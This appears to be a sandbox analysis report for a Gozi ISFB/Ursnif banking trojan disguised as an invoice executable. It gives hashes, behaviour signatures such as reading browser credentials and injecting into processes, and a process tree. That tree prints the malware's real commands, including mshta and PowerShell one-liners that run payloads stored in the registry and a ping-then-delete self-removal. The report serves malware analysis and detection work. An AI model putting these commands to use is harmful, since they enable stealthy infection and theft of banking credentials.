Overview

overview

10

Static

static

invoice_or...st.exe

windows7_x64

10

invoice_or...st.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    130s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    03-08-2020 12:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    invoice_order0045234_last.exe

  • Size

    232KB

  • MD5

    9ff1bb99a84f6efa175b721a37d14af7

  • SHA1

    ae9707f52f46ef38f686d755b22ad3a2d041e3cf

  • SHA256

    8b79bc15e6fa66285b46d5859e9c3fd784ec3b0dd7bcc41becd0b2b1a864cdf9

  • SHA512

    836c0a584fa255ca69dc1f6df2cb81ab0788bf2ad3306d3f95ba1963293066b2dc3c297c965ef0d13f41e105110ce75aa2aa6f3c209f9db6a8a52fe3aea68d80

Score
10/10
spywarebankertrojangozi_ifsbursnif

Malware Config

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

    bankertrojangozi_ifsb
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 52 IoCs
    adwarespyware
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

    bankertrojanursnif
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 1514 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • ServiceHost packer 1 IoCs

    Detects ServiceHost packer used for .NET malware

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Checks whether UAC is enabled 5 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: MapViewOfSection
    PID:3028
    • C:\Users\Admin\AppData\Local\Temp\invoice_order0045234_last.exe
      "C:\Users\Admin\AppData\Local\Temp\invoice_order0045234_last.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3104
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3138FBCE-DC53-8BDD-6EF5-D0EF82F90493\\\Cabvular'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3288
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\3138FBCE-DC53-8BDD-6EF5-D0EF82F90493").atl1stSv))
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: MapViewOfSection
        PID:3604
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jnkvlmpo\jnkvlmpo.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2852
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE8E4.tmp" "c:\Users\Admin\AppData\Local\Temp\jnkvlmpo\CSCBADCBD31B7C64DAB8DD92DB32E76489.TMP"
            5⤵
              PID:3312
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yimo0rpy\yimo0rpy.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3452
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE961.tmp" "c:\Users\Admin\AppData\Local\Temp\yimo0rpy\CSC210FC40A78EB425DA15A7A7250E68F6D.TMP"
              5⤵
                PID:656
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\invoice_order0045234_last.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          • Suspicious behavior: MapViewOfSection
          PID:3980
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:872
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\7CA8.bi1"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3284
          • C:\Windows\system32\nslookup.exe
            nslookup myip.opendns.com resolver1.opendns.com
            3⤵
              PID:2252
          • C:\Windows\system32\cmd.exe
            cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\7CA8.bi1"
            2⤵
              PID:3288
            • C:\Program Files\Windows Mail\WinMail.exe
              "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
              2⤵
                PID:3836
              • C:\Windows\syswow64\cmd.exe
                "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                2⤵
                  PID:3572
              • C:\Windows\System32\RuntimeBroker.exe
                C:\Windows\System32\RuntimeBroker.exe -Embedding
                1⤵
                  PID:3404
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  1⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  • Checks whether UAC is enabled
                  PID:3868
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3868 CREDAT:82945 /prefetch:2
                    2⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    • Checks whether UAC is enabled
                    PID:1484
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  1⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  • Checks whether UAC is enabled
                  PID:3584
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3584 CREDAT:82945 /prefetch:2
                    2⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    • Checks whether UAC is enabled
                    PID:3100
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3584 CREDAT:82952 /prefetch:2
                    2⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    • Checks whether UAC is enabled
                    PID:576

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • memory/3104-1-0x0000000002710000-0x0000000002711000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3104-0-0x00000000009E6000-0x00000000009E7000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3572-37-0x0000000001336CD0-0x0000000001336CD4-memory.dmp

                  Filesize

                  4B

                  Download